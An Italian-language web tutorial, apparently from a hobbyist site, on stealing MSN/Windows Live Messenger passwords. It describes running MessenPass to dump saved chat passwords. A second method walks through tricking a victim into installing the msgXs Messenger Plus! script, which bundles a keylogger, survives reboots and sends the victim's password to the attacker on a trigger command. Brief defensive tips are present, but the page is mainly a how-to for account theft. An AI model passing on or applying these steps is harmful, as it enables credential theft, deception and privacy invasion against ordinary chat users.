METODO 1°Purtroppo sono molto frequenti i casi di persone che si vedono rubare la password per accedere a MSN Messenger o Windows Live Messenger. Per rubare l’account di MSN Messenger ad una persona, i malintenzionati, oltre a rispondere alle domande segrete ed impostare una nuova password, fanno ricorso a programmi come MessenPass.
La maggior parte degli utenti, per evitare di scrivere nome utente e password ad ogni accesso, li fa memorizzare a MSN Messenger, mettendo un segno di spunta alla voce Memorizza profilo utente. Questi dati (nome utente e password) vengono così memorizzati nel Registro di sistema di Windows in forma criptata in modo che nessuno possa scoprirli a prima vista.
MessenPass è un programma che decripta le password salvate da MSN Messenger/Windows Live Messenger e le mostra in una semplice interfaccia. Oltre a MSN Messenger/Windows Live Messenger, MessenPass è in grado di scoprire le password salvate di altre applicazioni, quali Yahoo Messenger, Google Talk, ICQ Lite, AOL Instant Messenger, Trillian, Miranda e GAIM.
Per provare MessenPass, scaricatelo dalla
pagina MessenPass, facendo click sulla voce Download MessenPass in zip file. Nella stessa pagina web, scaricate la lingua italiana per MessenPass, facendo click sulla voce Italian.
A questo punto, estratete gli archivi scaricati nella stessa cartella, usando ad esempio Winzip. Se aprite, infine, il programma mspass.exe vedrete le password salvate dai programmi di chat nel vostro computer.
Selezionado le password e andando su File/Save Selected Items è possibile anche creare un file di testo con le password trovate nel computer. Il programma non richiede installazione ed è molto piccolo: può essere trasportato facilmente usando una chiavetta USB o anche un floppy disk.
Per evitare di farsi rubare la password, è bene non memorizzarla, specialmente se il nostro PC viene utilizzato da altre persone, che potrebbero semplicemente accedere a MSN Messenger. Molti inoltre sono i virus che hanno come principale compito appunto quello di rubare le password dei programmi di chat e inviarle ai loro creatori.
METODO 2° tutto a puro scopo informativo, dove è possibile scoprire la password di un contatto di MSN facendogli installare un semplice script per Messenger Plus! Live. Prima di tutto la vittima deve aver installato Messenger Plus! Live. Per capirlo basta chiederlo oppure vedere se ha il nickname colorato.
Ora resta che vi scaricate msgXs 1.5 da
QUI e inviarlo alla vittima. Pultroppo il rpoblema più grande e quello di far cascare la vittima ad aprirlo, e questo lo si può fare dicendogli che lo script ha una funziona vera. Lafunziona esiste davvero ed è quello di cambiare il Messaggio Personali direttamente da una Chat. I comandi di questa funziona sono:
1. !mp:[Messaggio nel PSM] = Con questo comando inserirete un nuovo Messaggio nel PSM di MSN. Al posto di [Messaggio nel PSM] dovete ovviamente scrivere la frase.
2. !mp:!mpm = Con questo comando potete modificare il vostro Messaggio personale.
Adesso invece vediamo i comandi per rubargli la Pass:
1. MSN aggiornato = E’ il comando con cui vi farete inviare le password all’insaputa dell’utente.
2. ciao-null- = Con questo invece gli farete cancellare la funziona di rubare la password. L’utente però dopo aver ricevuto questa scritta si deve disconettere da Messenger.
Lo script contiene 2 programmi principali:
* MessenPass: il programma con cui ruberete le password memorizzate.
* msgXs Keylogger: Il programma keylogger dove salverà le passwrod quando l’utente accederà ad MSN.
Quando la vittima avvierà lo script essa non potrà più cancellarlo perchè si riattiverà quando riavvia il sistema. Per rimuovere questo script allora bisogna andare nella cartella C:\Programmi\Messenger Plus! Live\Scripts e cancellare la cartella msgXs. E’ consigliato inoltre che la vittima chiede e riapre Messenger per rubare le password giuste. Questo è consigliato perchè quando la vittima chiude e riapre MSN il keylogger si avvierà e quindi ci sono più possibilità di scoprire la password. Ovviamente questo metodo funziona 8 volte su 10 ma si può sempre sbagliare.
Per scoprire se vi stanno facendo un attacco simile a voi, e voi avete installato questo script, allora spunterà una finestrella a destra del desktop con la scritta: Errore di connessione, Riprova più tardi. Se la vittima ha versioni più vecchie della 8.5, può capitare che non funzioni.
